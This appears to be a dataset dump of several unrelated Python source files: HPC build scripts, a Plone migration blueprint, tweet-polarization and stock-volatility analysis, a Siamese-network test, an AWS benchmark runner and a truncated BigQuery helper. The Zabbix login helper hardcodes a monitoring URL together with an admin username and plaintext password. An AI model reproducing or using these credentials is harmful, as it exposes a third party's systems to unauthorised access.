class attributes\n \"\"\"\n super(yellowstone,self).__init__( compiler, test, mpilib,debug)\n os.environ[\"LMOD_DEFAULT_MODULEPATH\"]=\"/glade/apps/opt/modulefiles/ca/compilers:/glade/apps/opt/modulefiles/ca/idep\" \n\n self.moduleList = ['ncarenv/1.0 ',\n 'cmake ',\n 'python ',\n 'ncarbinlibs/1.1 ']\n if compiler == 'intel':\n self.moduleList += ['intel/15.0.1',\n 'ncarcompilers/1.0']\n if mpilib is not \"mpi-serial\":\n self.moduleList += ['netcdf-mpi/4.3.3-rc3']\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn2013/\"\n else:\n self.moduleList += ['netcdf/4.3.2']\n self.CC = 'icc'\n self.FC = 'ifort'\n\n if compiler == 'pgi':\n self.moduleList += ['pgi/14.10',\n 'netcdf/4.3.0',\n 'ncarcompilers/1.0']\n if mpilib is not \"mpi-serial\":\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn1920/pgi\"\n\n\n if compiler == 'gnu':\n self.moduleList += ['gnu/4.9.2',\n 'ncarcompilers/1.0',\n 'netcdf/4.3.0']\n if mpilib is not \"mpi-serial\":\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn1920/gnu\"\n\n if mpilib is not 'mpi-serial':\n# self.moduleList += ['pnetcdf/1.4.1']\n self.FC = 'mpif90'\n self.CXX = 'mpiCC'\n\n self.BUILD_DIR = \"build_yellowstone_\" + compiler\n# os.environ[\"LMOD_CMD\"]=\"/glade/apps/opt/lmod/lmod/libexec/lmod\"\n# os.environ[\"LMOD_DIR\"]=\"/glade/apps/opt/lmod/lmod/libexec/\"\n\n# for key in os.environ.keys():\n# print(\"%30s %s\\n\" % (key,os.environ[key]))\n\n\n\n self.runModuleCmd()\n\n self.CMAKE_EXE = 'cmake'\n\n self.NUMPE = '4'\n\n self.OFLAGS += ('-D PLATFORM:STRING=yellowstone ')\n\n self.MPIEXEC = (' -D MPIEXEC:FILEPATH=\"mpirun.lsf \" ')\n #self.TEST_CMD = ('execca ctest --verbose -D Experimental')\n self.TEST_CMD = ('execca ctest --verbose')\n \n def testCmd(self):\n \"\"\" override testCmd s.t. 
on yellowstone we open a caldera interactive\n node, run the tests (same as the base class)\n and then exit the queue.\n \"\"\"\n self.envMod['DAV_CORES'] = self.NUMPE\n\n p = subprocess.Popen(self.TEST_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def runModuleCmd(self):\n \"\"\" implement ABC...add the lmod commands for yellowstone\n \"\"\"\n\n self.lmod = lmod.ModuleInterface()\n self.lmod.python_init(\"/glade/apps/opt/lmod/lmod/init/env_modules_python.py\")\n self.lmod.purge()\n\n for cmd in self.moduleList:\n print(\"Loading module \"+cmd)\n self.lmod.load(cmd)\n self.lmod.list()\n\n\nclass caldera(yellowstone):\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n self.test = test\n super(caldera,self).__init__(compiler, test,mpilib,debug)\n self.EXECCA = ''\n #self.TEST_CMD = ('ctest --verbose -D Experimental')\n self.TEST_CMD = ('execca ctest --verbose ')\n# os.environ[\"LMOD_DEFAULT_MODULEPATH\"]=\"/glade/apps/opt/modulefiles/ca/compilers:/glade/apps/opt/modulefiles/ca/idep\" \n\n\nclass cetus(platformBuilder):\n\n def __init__(self, compiler, test, mpilib, debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(cetus,self).__init__( compiler, test, mpilib, debug)\n\n self.moduleList = ['+mpiwrapper-xl ',\n '@ibm-compilers-2015-02 ',\n '+cmake ']\n\n self.srcroot = os.getcwd()\n self.BUILD_DIR = self.srcroot+\"/build_cetus_\" + compiler\n\n self.CMAKE_EXE = 'cmake '\n\n self.FC = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlf2003_r'\n self.CC = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlc_r'\n self.CXX = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlcxx'\n self.LDFLAGS = '-Wl,--relax -Wl,--allow-multiple-definition -Wl,--whole-archive -L/soft/libraries/hdf5/1.8.14/cnk-xl/V1R2M2-20150213/lib -lhdf5_hl -lhdf5 -L 
/soft/libraries/alcf/current/xl/ZLIB/lib -lz -Wl,--no-whole-archive ' \n self.MPIEXEC = (' -D MPIEXEC:FILEPATH=/usr/bin/runjob')\n MPIEXEC_PREFLAGS =('GPFSMPIO_NAGG_PSET=16:ROMIO_HINTS=/home/pkcoff/public/romio_hints:GPFSMPIO_BALANCECONTIG=1:GPFSMPIO_AGGMETHOD=2:PAMID_TYPED_ONESIDED=1:PAMID_RMA_PENDING=1M:GPFSMPIO_BRIDGERINGAGG=1 ')\n# self.envMod['MPIEXEC_PREFLAGS'] = MPIEXEC_PREFLAGS\n # We use a sh wrapper script on cetus so we need to escape any quotes in the cmake command line \n# self.OFLAGS += ('-D MPIEXEC_PREFLAGS=\\$ENV{MPIEXEC_PREFLAGS}')\n self.NUMPE = ''\n\n self.OFLAGS += (' -D PLATFORM:STRING=cetus -DCMAKE_C_COMPILER='+self.CC)\n self.OFLAGS += (' -DCMAKE_Fortran_COMPILER='+self.FC)\n self.OFLAGS += (' -DCMAKE_CXX_COMPILER='+self.CXX)\n self.TEST_CMD = ('qsub -o pio2build.out -t 30 -n 1 --mode script '+self.srcroot+'/scripts/cetus_test.sh ')\n self.MAKE_CMD = (\"/bin/sh\"+\" ./cetus_env.sh\"+\" make all \")\n self.runModuleCmd()\n\n def buildCmd(self):\n \"\"\" run build\n \"\"\"\n p = subprocess.Popen(self.MAKE_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def testCmd(self):\n\n p = subprocess.Popen(self.TEST_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def runModuleCmd(self):\n \"\"\" Using the soft environment requires sourcing the soft\n environment script file - this is not possible right now\n with the current framework. So the next best option is\n to source an environment file everytime we run a command\n (cmake, make) - cetus_env.sh\n This module sources the cetus environment script and grabs\n the PNETCDF and NETCDF installation directories set by\n the script. Note that there are no soft environments for\n these libraries on Cetus\n \"\"\"\n # ~# make build directory and move to it.\n if not os.path.exists(self.BUILD_DIR):\n os.makedirs(self.BUILD_DIR)\n\n os.chdir(self.BUILD_DIR)\n f = open(\"cetus_env.sh\", 'w')\n f.write(\"#!/bin/sh -x\\n\")\n f.write(\". 
/etc/profile.d/00softenv.sh\\n\")\n for line in self.moduleList: \n f.write(\"soft add \"+line+\"\\n\")\n f.write(\"export LDFLAGS=\\\"\"+self.LDFLAGS+\"\\\"\\n\")\n f.write(\"echo $@\\n\")\n f.write(\"$@\\n\")\n f.close()\n \t\t\t\t\n def cmakeCmd(self):\n \"\"\" cmake command to run\n For cetus the cetus environment script, cetus_env.sh,\n is sourced before running cmake. Overriding this function\n makes this workflow easier.\n \"\"\"\n\n # ~# change environemnt, first get existing env\n self.envMod = dict(os.environ)\n # ~# add to env\n self.envMod['FC'] = self.FC\n self.envMod['CC'] = self.CC\n self.envMod['CXX'] = self.CXX\n# self.envMod['LDFLAGS'] = self.LDFLAGS\n\n cmakeString = (self.CMAKE_EXE + self.OFLAGS + self.MPIEXEC+\" \"+self.srcroot)\n cmakeString = (\"/bin/sh\"+\" ./cetus_env.sh \" +\n cmakeString )\n\n print(cmakeString)\n\n p = subprocess.Popen(cmakeString,\n shell=True, env=self.envMod)\n p.wait()\n# The cmake generated CTestTestfile.cmake has incorrect formating \n# I havent found a way to fix it in cmake (where it should be fixed)\n# replace all occurrences of '\\$' with '$' \n\n for i, line in enumerate(fileinput.input(self.BUILD_DIR+'/unittests/CTestTestfile.cmake', inplace=1)):\n sys.stdout.write(line.replace('\\$', '$')) \n\n for i, line in enumerate(fileinput.input(self.BUILD_DIR+'/test/CTestTestfile.cmake', inplace=1)):\n sys.stdout.write(line.replace('\\$', '$')) \n\n\n\n\n","sub_path":"_UNUSED_/scripts/python/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":16259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300774140","text":"# -*- coding: utf-8 -*-\nfrom collective.transmogrifier.interfaces import ISection\nfrom collective.transmogrifier.interfaces import ISectionBlueprint\nfrom zope.interface import provider\nfrom zope.interface import implementer\n\nimport logging\nimport transaction\n\n\n@provider(ISectionBlueprint)\n@implementer(ISection)\nclass 
PartialCommit(object):\n\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n self.step = int(options.get('every', 100))\n\n def __iter__(self):\n count = 1\n for item in self.previous:\n yield item\n if count % self.step == 0:\n transaction.commit()\n logging.info('Committed after %s' % count)\n count += 1\n","sub_path":"collective/jsonmigrator/blueprints/partialcommit.py","file_name":"partialcommit.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245258479","text":"#!/usr/bin/env python2.7\n#coding=utf-8\n\n__author__ = \"zhuobaobao\"\n\nimport json\nimport urllib2\n\nclass Get_Authid(object):\n def __init__(self):\n self.url = \"http://monitor.15166.com/monitor/api_jsonrpc.php\"\n self.header = {\"Content-Type\":\"application/json\"}\n self.data = json.dumps(\n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": \"admin\",\n \"password\": \"JoyGames2016\"\n },\n \"id\": 0\n })\n def get_authid(self):\n request = urllib2.Request(self.url,self.data)\n for key in self.header:\n request.add_header(key,self.header[key])\n result = urllib2.urlopen(request)\n response = json.loads(result.read())\n result.close()\n return response[\"result\"]\n\n\n\n","sub_path":"mysite/joygame/api/zabbix_authid.py","file_name":"zabbix_authid.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"364429754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport json\nimport sys\n\nimport pandas as pd\nsys.path.append('..')\nfrom helpers.funcs import *\n\nfrom calculate_leaveout_polarization import get_leaveout_value\n\nconfig = json.load(open('../config.json', 'r'))\nINPUT_DIR = config['INPUT_DIR']\nOUTPUT_DIR = config['OUTPUT_DIR']\nTWEET_DIR = config['TWEET_DIR']\n\nevents = 
open(INPUT_DIR + 'event_names.txt', 'r').read().splitlines()\nprint(events)\n\ndef get_polarization(event, method = \"nofilter\", cluster_method = None):\n '''\n\n :param event: name of the event (str)\n :param method: \"nofilter\" (default): use all tweets\n \"noRT\": ignore retweets only\n \"clustered\": keep only tweets that were assigned to clusters; this is a subset of \"cleaned\n :param cluster_method: None, \"relative\" or \"absolute\" (see 5_assign_tweets_to_clusters.py); must have relevant files\n :return: tuple: (true value, random value)\n '''\n data = pd.read_csv(TWEET_DIR + event + '/' + event + '.csv', sep='\\t', lineterminator='\\n', usecols=['text', 'timestamp', 'user_id', 'dem_follows', 'rep_follows', 'remove', 'isRT'])\n if method == \"noRT\":\n data = filter_retweets(data)\n elif method == 'clustered':\n data = get_cluster_assignments(event, data, cluster_method)\n elif method != \"nofilter\":\n print(\"invalid method.\")\n return None\n\n print(event, len(data))\n return get_leaveout_value(event, data)\n\nif __name__ == \"__main__\":\n event_polarization = {}\n method = sys.argv[1]\n cluster_method = None if len(sys.argv) < 3 else sys.argv[2]\n for e in events:\n event_polarization[e] = tuple(get_polarization(e, method, cluster_method))\n\n cluster_method = method_name(cluster_method)\n with open(OUTPUT_DIR + 'polarization_' + method + cluster_method + '.json', 'w') as f:\n f.write(json.dumps(event_polarization))\n","sub_path":"3_leave_out_polarization/overall_polarization.py","file_name":"overall_polarization.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231361966","text":"\"\"\"\nA store of really useful functions.\n\"\"\"\n\n\ndef log_return(list_stock_prices):\n return np.log(list_stock_prices).diff()\n\n\ndef realized_volatility(series_log_return):\n return np.sqrt(np.sum(series_log_return ** 2))\n\n\ndef calculate_wap(df):\n \"\"\"\n 
https://www.kaggle.com/konradb/we-need-to-go-deeper\n \"\"\"\n # a = df['bid_price1'] * df['ask_size1'] + df['ask_price1'] * df['bid_size1']\n # b = df['bid_size1']+ df['ask_size1']\n\n a1 = df[\"bid_price1\"] * df[\"ask_size1\"] + df[\"ask_price1\"] * df[\"bid_size1\"]\n a2 = df[\"bid_price2\"] * df[\"ask_size2\"] + df[\"ask_price2\"] * df[\"bid_size2\"]\n b = df[\"bid_size1\"] + df[\"ask_size1\"] + df[\"bid_size2\"] + df[\"ask_size2\"]\n\n x = (a1 + a2) / b\n return x\n\n\ndef get_log_return_df_per_time_id(file_path):\n dataset = pq.ParquetDataset(file_path)\n book_dataset = dataset.read()\n df_book_data = book_dataset.to_pandas()\n\n df_book_data[\"wap\"] = calculate_wap(df_book_data)\n df_book_data[\"log_return\"] = df_book_data.groupby([\"time_id\"])[\"wap\"].apply(\n log_return\n )\n df_book_data = df_book_data[~df_book_data[\"log_return\"].isnull()]\n\n stock_id = file_path.split(\"=\")[1]\n df_book_data[\"row_id\"] = df_book_data[\"time_id\"].apply(lambda x: f\"{stock_id}-{x}\")\n\n del dataset, book_dataset\n gc.collect()\n return df_book_data\n\n\ndef get_realized_volatility_df_per_time_id(file_path):\n # df_book_data = pd.read_parquet(file_path)\n dataset = pq.ParquetDataset(file_path)\n book_dataset = dataset.read()\n df_book_data = book_dataset.to_pandas()\n\n df_book_data[\"wap\"] = calculate_wap(book_example)\n df_book_data[\"log_return\"] = df_book_data.groupby([\"time_id\"])[\"wap\"].apply(\n log_return\n )\n df_book_data = df_book_data[~df_book_data[\"log_return\"].isnull()]\n\n df_book_data[\"realized_volatility\"] = df_book_data.groupby([\"time_id\"])[\n \"log_return\"\n ].apply(realized_volatility)\n df_book_data = df_book_data[~df_book_data[\"realized_volatility\"].isnull()]\n\n stock_id = file_path.split(\"=\")[1]\n df_book_data[\"row_id\"] = df_book_data[\"time_id\"].apply(lambda x: f\"{stock_id}-{x}\")\n\n del dataset, book_dataset\n gc.collect()\n\n return df_book_data\n\n\ndef realized_volatility_per_time_id(file_path, 
prediction_column_name):\n df_book = pd.read_parquet(file_path)\n df_book[\"wap\"] = calculate_wap(df_book)\n df_book[\"log_return\"] = df_book.groupby([\"time_id\"])[\"wap\"].apply(log_return)\n df_book = df_book[~df_book[\"log_return\"].isnull()]\n df_realized_vol_per_stock = pd.DataFrame(\n df_book.groupby([\"time_id\"])[\"log_return\"].agg(realized_volatility)\n ).reset_index()\n df_realized_vol_per_stock = df_realized_vol_per_stock.rename(\n columns={\"log_return\": prediction_column_name}\n )\n stock_id = file_path.split(\"=\")[1]\n df_realized_vol_per_stock[\"row_id\"] = df_realized_vol_per_stock[\"time_id\"].apply(\n lambda x: f\"{stock_id}-{x}\"\n )\n return df_realized_vol_per_stock[[\"row_id\", prediction_column_name]]\n\n\n# %%\ndef feature_engineering(df, null_val=-9999):\n for n in range(1, 3):\n p1 = df[f\"bid_price{n}\"]\n p2 = df[f\"ask_price{n}\"]\n s1 = df[f\"bid_size{n}\"]\n s2 = df[f\"ask_size{n}\"]\n df[\"WAP\"] = (p1 * s2 + p2 * s1) / (s1 + s2)\n\n df[\"log_wap\"] = df[\"WAP\"].log()\n df[\"log_wap_shifted\"] = (\n df[[\"time_id\", \"log_wap\"]]\n .groupby(\"time_id\", method=\"cudf\")\n .apply_grouped(\n cutran.get_cu_shift_transform(shift_by=1, null_val=null_val),\n incols={\"log_wap\": \"x\"},\n outcols=dict(y_out=cp.float32),\n tpb=32,\n )[\"y_out\"]\n )\n df = df[df[\"log_wap_shifted\"] != null_val]\n\n df[\"diff_log_wap\"] = df[\"log_wap\"] - df[\"log_wap_shifted\"]\n df[f\"diff_log_wap{n}\"] = df[\"diff_log_wap\"] ** 2\n\n df[\"c\"] = 1\n\n sum_df = (\n df.groupby(\"time_id\")\n .agg({\"diff_log_wap1\": {\"sum\", \"std\"}, \"diff_log_wap2\": \"sum\", \"c\": \"sum\"})\n .reset_index()\n )\n\n def f(x):\n if x[1] == \"\":\n return x[0]\n return x[0] + \"_\" + x[1]\n\n sum_df.columns = [f(x) for x in sum_df.columns]\n sum_df[\"volatility1\"] = (sum_df[\"diff_log_wap1_sum\"]) ** 0.5\n sum_df[\"volatility2\"] = (sum_df[\"diff_log_wap2_sum\"]) ** 0.5\n sum_df[\"c\"] = sum_df[\"c_sum\"].values\n sum_df[\"vol_std\"] = 
sum_df[\"diff_log_wap1_std\"].fillna(0).values\n sum_df[\"volatility_rate\"] = (sum_df[\"volatility1\"] / sum_df[\"volatility2\"]).fillna(\n 0\n )\n return sum_df[[\"time_id\", \"volatility1\", \"volatility_rate\", \"c\", \"vol_std\"]]\n\n","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482988136","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom typing import Tuple\n\n\nGLOVE_6B_PATH = \"../glove/glove_6b/glove.6B.50d.txt\"\n\n\ndef glove_6b_dict():\n \"\"\" Return dict with GloVe 6B embeddings \"\"\"\n def line_to_embedding(line: str) -> Tuple[str, np.ndarray]:\n tokens = line.split()\n return (tokens[0], np.asarray(tokens[1:], 'float32'))\n with open(GLOVE_6B_PATH, 'r') as f:\n embeddings = (line_to_embedding(l) for l in f)\n return {k: v for k, v in embeddings}\n\n\nif __name__ == \"__main__\":\n glove = glove_6b_dict()\n print(len(glove))\n","sub_path":"models/glove.py","file_name":"glove.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316709238","text":"\"\"\"Siamese Networksのテスト。\"\"\"\nimport logging\nimport pathlib\n\nimport keras\nimport keras.preprocessing.image\nimport numpy as np\nimport sklearn.metrics\nfrom tqdm import tqdm\n\nfrom siamese_train import distance_np, load_image\n\nBATCH_SIZE = 32\n\nTEST_DIRS = [p for p in pathlib.Path('data/test').iterdir()]\nCLASS_NAMES = [p.name for p in TEST_DIRS]\nCLASS_NAMES_TO_ID = {class_name: i for i, class_name in enumerate(CLASS_NAMES)}\nTRAIN_DIRS = [p for p in pathlib.Path('data/train').iterdir() if p.name in CLASS_NAMES]\nassert len(TRAIN_DIRS) == len(TEST_DIRS)\n\ntry:\n import better_exceptions\nexcept BaseException:\n pass\n\n\ndef _main():\n decoder = keras.models.load_model('decoder.h5', compile=False)\n\n 
logging.basicConfig(level=logging.INFO, filename='siamese_result.txt', filemode='w')\n logger = logging.getLogger(__name__)\n logger.addHandler(logging.StreamHandler())\n\n X_train, y_train = [], []\n for p in TRAIN_DIRS:\n class_id = CLASS_NAMES_TO_ID[p.name]\n x_class = [x for x in p.iterdir()]\n assert len(x_class) >= 1\n X_train.extend(x_class)\n y_train.extend([class_id] * len(x_class))\n y_train = np.array(y_train)\n\n X_test, y_test = [], []\n for p in TEST_DIRS:\n class_id = CLASS_NAMES_TO_ID[p.name]\n x_class = [x for x in p.iterdir()]\n assert len(x_class) >= 1\n X_test.extend(x_class)\n y_test.extend([class_id] * len(x_class))\n assert class_id in y_train\n y_test = np.array(y_test)\n\n # trainのdecode\n feature_train = []\n for X_batch in tqdm(np.array_split(X_train, len(X_train) // BATCH_SIZE), ascii=True):\n imgs = np.array([load_image(x, train=False) for x in X_batch])\n feats = decoder.predict(imgs)\n feature_train.extend(feats)\n feature_train = np.array(feature_train)\n assert len(feature_train) == len(y_train)\n\n # testのdecode & 予測\n true_list = []\n pred_list = []\n order_list = []\n match_dist_info = []\n unmatch_dist_info = []\n for x, y in tqdm(list(zip(X_test, y_test)), ascii=True):\n img = load_image(x, train=False)\n feats = decoder.predict(np.expand_dims(img, axis=0))[0]\n distances = distance_np(feature_train, feats[np.newaxis, :])\n assert distances.shape == (len(y_train),)\n pred_test = y_train[distances.argmin(axis=0)]\n pred_list.append(pred_test)\n true_list.append(y)\n for i, j in enumerate(distances.argsort(axis=0)):\n if y == y_train[j]:\n order_list.append(i)\n break\n\n def _get_info(a):\n assert len(a) > 0\n return np.amin(a), np.amax(a), np.mean(a), np.median(a)\n match_dist_info.append(_get_info(distances[y_train == y]))\n unmatch_dist_info.append(_get_info(distances[y_train != y]))\n true_list = np.array(true_list)\n pred_list = np.array(pred_list)\n order_list = np.array(order_list)\n\n logger.info('mean order: %.1f', 
np.mean(order_list))\n logger.info('test accuracy: %.4f', sklearn.metrics.accuracy_score(true_list, pred_list))\n # logger.info('top 1 accuracy: %.4f', np.mean(order_list < 1))\n logger.info('top 5 accuracy: %.4f', np.mean(order_list < 5))\n logger.info('top 10 accuracy: %.4f', np.mean(order_list < 10))\n logger.info('top 15 accuracy: %.4f', np.mean(order_list < 15))\n\n def _print_info(name, aa):\n logger.info(name + ':')\n logger.info(' min: %.4f', np.mean([a[0] for a in aa]))\n logger.info(' max: %.4f', np.mean([a[1] for a in aa]))\n logger.info(' mean: %.4f', np.mean([a[2] for a in aa]))\n logger.info(' median: %.4f', np.mean([a[3] for a in aa]))\n\n _print_info('match', match_dist_info)\n _print_info('unmatch', unmatch_dist_info)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"siamese_test.py","file_name":"siamese_test.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281043918","text":"import optparse\nimport sys\nimport uuid\nfrom twindb_benchmarks.providers.aws.aws_connection import AWSConnection\nfrom twindb_benchmarks.providers.aws.aws_network import AWSNetwork, AWSFirewall\nfrom twindb_benchmarks.providers.aws.aws_ssh import AWSSsh\nfrom twindb_benchmarks.providers.aws.aws_virtual_machine import VMSpec\nfrom twindb_benchmarks.providers.aws.aws_virtual_machine import AWSVirtualMachine\nfrom twindb_benchmarks.packages import sysbench\nfrom twindb_benchmarks import log\n\n\ndef main():\n parser = optparse.OptionParser('usage: %prog [options]')\n parser.add_option('-k', '--access-key', dest='access_key_id', type='string', help='Specify Access Key ID')\n parser.add_option('-s', '--access-secret', dest='access_secret', type='string', help='Specify Secret Access Key')\n parser.add_option('-z', '--zone', dest='zone', type='string', help='Availability Zone')\n\n (options, args) = parser.parse_args()\n\n if options.access_key_id is None or 
options.access_secret is None or options.zone is None:\n parser.print_help()\n sys.exit(1)\n\n run_uid = str(uuid.uuid4())[-8:]\n\n log.configure_logging(stderr_log_level=log.DEBUG, log_path=log.get_log_file_path(),\n run_uid=run_uid, file_log_level=log.DEBUG)\n\n connector = AWSConnection(options.access_key_id, options.access_secret, options.zone)\n connection = connector.get_connection()\n\n client_vm = None\n firewall = None\n ssh = None\n try:\n network = AWSNetwork(connection, connector.zone)\n firewall = AWSFirewall(connection, network)\n ssh = AWSSsh(connection)\n\n vm_spec = VMSpec(instance_type='t2.micro', ebs_optimized=False, ebs_volumes=[], allowed_ports=[3306])\n\n client_vm = AWSVirtualMachine(connection, network, firewall, ssh, vm_spec)\n client_vm.create()\n client_vm.wait_for_boot()\n client_vm.prepare_environment()\n\n sysbench.yum_install(client_vm)\n finally:\n if client_vm is not None:\n client_vm.delete()\n\n if firewall is not None:\n firewall.cleanup()\n \n if ssh is not None:\n ssh.delete_ssh_key()\n\nif __name__ == '__main__':\n main()\n","sub_path":"twindb-benchmarks.py","file_name":"twindb-benchmarks.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390582767","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^u/', include('accounts.urls')),\n url(r'^book/', include('books.urls.books')),\n url(r'^series/', include('books.urls.series')),\n url(r'^author/', include('books.urls.authors')),\n url(r'^login/$', login, {'template_name': 'accounts/login.html'}, name='login'),\n url(r'^logout/$', logout, {'template_name': 'accounts/logout.html'}, name='logout'),\n]\n\nif settings.DEBUG:\n urlpatterns += 
static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n import debug_toolbar\n\n urlpatterns += [url(r'^__debug__/', include(debug_toolbar.urls)),\n ]\n","sub_path":"mbl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"512733501","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2015年8月9日\n\n@author: lowitty\n\"\"\"\nimport os\n\n\ndef cmd_executable(cmd):\n def is_exe(file):\n return os.path.isfile(file) and os.access(file, os.X_OK)\n \n cmdPath, cmdFile = os.path.split(cmd)\n if cmdPath:\n if(is_exe(cmd)):\n return cmd\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, cmd)\n if(is_exe(exe_file)):\n return exe_file\n return None\n","sub_path":"com/ericsson/xn/xtool/CommonFunction.py","file_name":"CommonFunction.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641104731","text":"from os import listdir\nfrom base64 import b64encode\n\ndef detectFolders(where = \".\"):\n\tdirectories = []\n\tfor file in listdir(where):\n\t\tif len(file.split(\".\")) == 1:\n\t\t\tif not file in directories and file != \"__pycache__\":\n\t\t\t\tdirectories.append(where + \"/\" + file)\n\tmoredirs = []\n\tif directories != []:\n\t\tfor direct in directories:\n\t\t\tmoredirs += detectFolders(direct)\n\treturn [*dict.fromkeys(directories + moredirs + [\".\"]).keys()]\n\ndef embedTo(output = \"embed.py\", target = None, args = None, where = None):\n\twith open(output, \"w\") as embededFile:\n\t\tembededFile.write(\"from base64 import b64decode\\nfrom os import makedirs, remove\\nfolders = \" + str(detectFolders()) + \"\\nfor folder in folders:\\n\\tif folder != 
\\\".\\\":\\n\\t\\ttry:\\n\\t\\t\\tremove(folder)\\n\\t\\texcept:\\n\\t\\t\\tpass\\n\\t\\ttry:\\n\\t\\t\\tmakedirs(folder)\\n\\t\\texcept:\\n\\t\\t\\tpass\\n\")\n\t\tdirectories = detectFolders()\n\t\tfor directorio in directories:\n\t\t\tfor file in listdir(directorio):\n\t\t\t\tif file != output and len(file.split(\".\")) >= 2:\n\t\t\t\t\tif file.split(\".\")[0] not in [\"embederUtil\"]:\n\t\t\t\t\t\twith open(directorio + \"/\" + file, \"r\") as template:\n\t\t\t\t\t\t\tencoded = b64encode(template.read().encode()).decode()\n\t\t\t\t\t\t\tembededFile.write(file.split(\".\")[0] + \" = b64decode(\\\"\" + encoded + \"\\\".encode())\\n\")\n\t\t\t\t\t\t\tembededFile.write(\"open(\\\"\" + str(directorio + \"/\" + file) + \"\\\", \\\"w\\\").write(\" + file.split(\".\")[0] + \".decode())\\n\")\n\t\tif where != None:\n\t\t\tembededFile.write(\"from \" + str(where) + \" import \" + str(target) + \"\\n\")\n\t\t\tif target != None:\n\t\t\t\tembededFile.write(target + \"(\")\n\t\t\t\tif args != None:\n\t\t\t\t\tembededFile.write(\", \".join(list(map(str, args))))\n\t\t\t\tembededFile.write(\")\\n\")\n\nembedTo()","sub_path":"embederTool.py","file_name":"embederTool.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403612316","text":"import argparse\n\nimport resources\nfrom bq_utils import list_all_table_ids, query, wait_on_jobs, BigQueryJobWaitError\nfrom utils import bq\nfrom tools import snapshot_by_query\n\nMODIFIED_FIELD_NAMES = {\n # Modified field names from 5.2 to 5.3.1\n 'modifier_source_value': {\n 'old_name': 'qualifier_source_value',\n 'new_name': 'modifier_source_value'\n },\n 'npi': {\n 'old_name': 'NPI',\n 'new_name': 'npi'\n },\n 'dea': {\n 'old_name': 'DEA',\n 'new_name': 'dea'\n },\n 'revenue_code_source_value': {\n 'old_name': 'reveue_code_source_value',\n 'new_name': 'revenue_code_source_value'\n }\n}\n\"\"\"Modified field names from 5.2 to 
5.3.1\"\"\"\n\n\ndef get_field_cast_expr_with_schema_change(dest_field, source_fields):\n \"\"\"\n generates cast expression based on data_type for the field and modified column names\n\n :param dest_field: field dictionary object\n :param source_fields: list of field names in source table\n :return: col string\n \"\"\"\n\n dest_field_name = dest_field['name']\n dest_field_mode = dest_field['mode']\n dest_field_type = dest_field['type']\n if dest_field_name in source_fields:\n col = f'CAST({dest_field_name} AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n # TODO handle possible data type difference?\n else:\n if dest_field_mode == 'nullable':\n col = f'CAST(NULL AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n if dest_field_name in MODIFIED_FIELD_NAMES.keys():\n old_name = MODIFIED_FIELD_NAMES[dest_field_name][\"old_name\"]\n if old_name in source_fields:\n # Case when the field is one of the modified fields from 5.2 to 5.3\n col = f'CAST({old_name} AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n elif dest_field_mode == 'required':\n raise RuntimeError(\n f'Unable to load the field \"{dest_field_name}\" which is required in the destination table \\\n and missing from the source table')\n else:\n raise RuntimeError(\n f'Mode for 